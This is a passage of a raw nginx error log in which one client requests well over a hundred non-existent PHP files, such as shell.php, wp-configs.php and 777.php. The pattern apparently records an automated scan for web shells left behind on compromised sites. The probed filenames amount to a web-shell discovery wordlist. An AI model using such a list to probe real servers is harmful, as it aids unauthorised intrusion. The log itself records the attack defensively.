(2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /mail.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:00 [error] 266#266: *16255 open() "/var/www/html/v3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /v3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:01 [error] 266#266: *16255 open() "/var/www/html/ilex.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ilex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:01 [error] 266#266: *16255 open() "/var/www/html/wto.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wto.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:01 [error] 266#266: *16255 open() "/var/www/html/777.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /777.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:01 [error] 266#266: *16255 open() "/var/www/html/file88.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file88.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:02 [error] 266#266: *16255 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:02 [error] 266#266: *16255 open() "/var/www/html/ffile.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ffile.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:02 [error] 266#266: *16255 open() "/var/www/html/p.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /p.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:03 [error] 266#266: *16255 open() "/var/www/html/000.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /000.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:03 [error] 266#266: *16255 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:03 [error] 266#266: *16255 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:04 [error] 266#266: *16255 open() "/var/www/html/lol.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /lol.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:04 [error] 266#266: *16255 open() "/var/www/html/cc.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /cc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:04 [error] 266#266: *16255 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:04 [error] 266#266: *16255 open() "/var/www/html/aaa.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /aaa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:05 [error] 266#266: *16255 open() "/var/www/html/n.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /n.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:05 [error] 266#266: *16255 open() "/var/www/html/666.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /666.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:05 [error] 266#266: *16255 open() "/var/www/html/fileas.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /fileas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:05 [error] 266#266: *16255 open() "/var/www/html/cccc.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /cccc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:06 [error] 266#266: *16255 open() "/var/www/html/CLA.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /CLA.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:06 [error] 266#266: *16255 open() "/var/www/html/wfile.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wfile.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:06 [error] 266#266: *16255 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:06 [error] 266#266: *16255 open() "/var/www/html/wb.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wb.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:07 [error] 266#266: *16255 open() "/var/www/html/mds.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /mds.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:07 [error] 266#266: *16255 open() "/var/www/html/mlex.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /mlex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:07 [error] 266#266: *16255 open() "/var/www/html/a.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /a.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:08 [error] 266#266: *16255 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:08 [error] 266#266: *16255 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:08 [error] 266#266: *16255 open() "/var/www/html/inde.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /inde.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:08 [error] 266#266: *16255 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:09 [error] 266#266: *16255 open() "/var/www/html/vee.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /vee.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:09 [error] 266#266: *16255 open() "/var/www/html/wcas.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wcas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:09 [error] 266#266: *16255 open() "/var/www/html/k.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /k.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:10 [error] 266#266: *16255 open() "/var/www/html/finny.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /finny.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:10 [error] 266#266: *16255 open() "/var/www/html/ws45.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws45.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:10 [error] 266#266: *16255 open() "/var/www/html/build.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /build.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:10 [error] 266#266: *16255 open() "/var/www/html/ws33.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws33.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:11 [error] 266#266: *16255 open() "/var/www/html/klex.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /klex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:11 [error] 266#266: *16255 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:11 [error] 266#266: *16255 open() "/var/www/html/alpa.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /alpa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:11 [error] 266#266: *16255 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:12 [error] 266#266: *16255 open() "/var/www/html/444.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /444.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:12 [error] 266#266: *16255 open() "/var/www/html/pp.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /pp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:12 [error] 266#266: *16255 open() "/var/www/html/2.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:12 [error] 266#266: *16255 open() "/var/www/html/ws38.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws38.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:13 [error] 266#266: *16255 open() "/var/www/html/555.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /555.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:13 [error] 266#266: *16255 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:13 [error] 266#266: *16255 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:13 [error] 266#266: *16255 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:14 [error] 266#266: *16255 open() "/var/www/html/he.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /he.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:14 [error] 266#266: *16255 open() "/var/www/html/cfile.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /cfile.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:14 [error] 266#266: *16255 open() "/var/www/html/doti.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /doti.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:15 [error] 266#266: *16255 open() "/var/www/html/sko.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /sko.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:15 [error] 266#266: *16255 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:15 [error] 266#266: *16255 open() "/var/www/html/ws37.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws37.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:15 [error] 266#266: *16255 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:16 [error] 266#266: *16255 open() "/var/www/html/nfile.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /nfile.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:16 [error] 266#266: *16255 open() "/var/www/html/file32.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file32.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:16 [error] 266#266: *16255 open() "/var/www/html/class9.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /class9.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:16 [error] 266#266: *16255 open() "/var/www/html/031.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /031.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:17 [error] 266#266: *16255 open() "/var/www/html/file4.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:17 [error] 266#266: *16255 open() "/var/www/html/file5.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file5.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:17 [error] 266#266: *16255 open() "/var/www/html/tx38.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /tx38.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:17 [error] 266#266: *16255 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:18 [error] 266#266: *16255 open() "/var/www/html/bless3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /bless3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:18 [error] 266#266: *16255 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:18 [error] 266#266: *16255 open() "/var/www/html/akk.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /akk.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:19 [error] 266#266: *16255 open() "/var/www/html/aa.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /aa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:19 [error] 266#266: *16255 open() "/var/www/html/x7.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /x7.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:19 [error] 266#266: *16255 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:19 [error] 266#266: *16255 open() "/var/www/html/0x0x.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /0x0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:20 [error] 266#266: *16255 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:20 [error] 266#266: *16255 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:20 [error] 266#266: *16255 open() "/var/www/html/card.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /card.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:20 [error] 266#266: *16255 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:21 [error] 266#266: *16255 open() "/var/www/html/class629.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /class629.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:21 [error] 266#266: *16255 open() "/var/www/html/file9.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file9.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:21 [error] 266#266: *16255 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /moon.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:22 [error] 266#266: *16255 open() "/var/www/html/file18.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file18.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:22 [error] 266#266: *16255 open() "/var/www/html/file21.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file21.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:22 [error] 266#266: *16255 open() "/var/www/html/xxw.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /xxw.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:23 [error] 266#266: *16255 open() "/var/www/html/racs3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /racs3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:23 [error] 266#266: *16255 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:23 [error] 266#266: *16255 open() "/var/www/html/333.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /333.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:23 [error] 266#266: *16255 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /12.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:24 [error] 266#266: *16255 open() "/var/www/html/moon3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /moon3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:24 [error] 266#266: *16255 open() "/var/www/html/tor.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /tor.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:24 [error] 266#266: *16255 open() "/var/www/html/haa.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /haa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:24 [error] 266#266: *16255 open() "/var/www/html/f6.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /f6.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:25 [error] 266#266: *16255 open() "/var/www/html/asas.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /asas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:25 [error] 266#266: *16255 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:25 [error] 266#266: *16255 open() "/var/www/html/ava.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ava.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:26 [error] 266#266: *16255 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:26 [error] 266#266: *16255 open() "/var/www/html/v1.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /v1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:26 [error] 266#266: *16255 open() "/var/www/html/111.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /111.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:27 [error] 266#266: *16255 open() "/var/www/html/an7.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /an7.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:27 [error] 266#266: *16255 open() "/var/www/html/xeqdlun.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /xeqdlun.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:27 [error] 266#266: *16255 open() "/var/www/html/acp.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /acp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:28 [error] 266#266: *16255 open() "/var/www/html/yellow.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /yellow.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:28 [error] 266#266: *16255 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:28 [error] 266#266: *16255 open() "/var/www/html/file3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:28 [error] 266#266: *16255 open() "/var/www/html/file17.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file17.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:29 [error] 266#266: *16255 open() "/var/www/html/shell.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /shell.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:29 [error] 266#266: *16255 open() "/var/www/html/file15.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file15.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:29 [error] 266#266: *16255 open() "/var/www/html/file30.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file30.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:29 [error] 266#266: *16255 open() "/var/www/html/bless5.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /bless5.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:30 [error] 266#266: *16255 open() "/var/www/html/wp-is.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wp-is.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:30 [error] 266#266: *16255 open() "/var/www/html/hook.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /hook.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:30 [error] 266#266: *16255 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:31 [error] 266#266: *16255 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:31 [error] 266#266: *16255 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:31 [error] 266#266: *16255 open() "/var/www/html/plss3.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /plss3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:31 [error] 266#266: *16255 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:32 [error] 266#266: *16255 open() "/var/www/html/file1.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:32 [error] 266#266: *16255 open() "/var/www/html/file8.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /file8.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:32 [error] 266#266: *16255 open() "/var/www/html/100.kb.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /100.kb.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:32 [error] 266#266: *16255 open() "/var/www/html/ppp.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /ppp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:33 [error] 266#266: *16255 open() "/var/www/html/tox.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /tox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:33 [error] 266#266: *16255 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:33 [error] 266#266: *16255 open() "/var/www/html/030.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /030.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:33 [error] 266#266: *16255 open() "/var/www/html/v4.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /v4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:34 [error] 266#266: *16255 open() "/var/www/html/xxx.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /xxx.php HTTP/1.1", host: 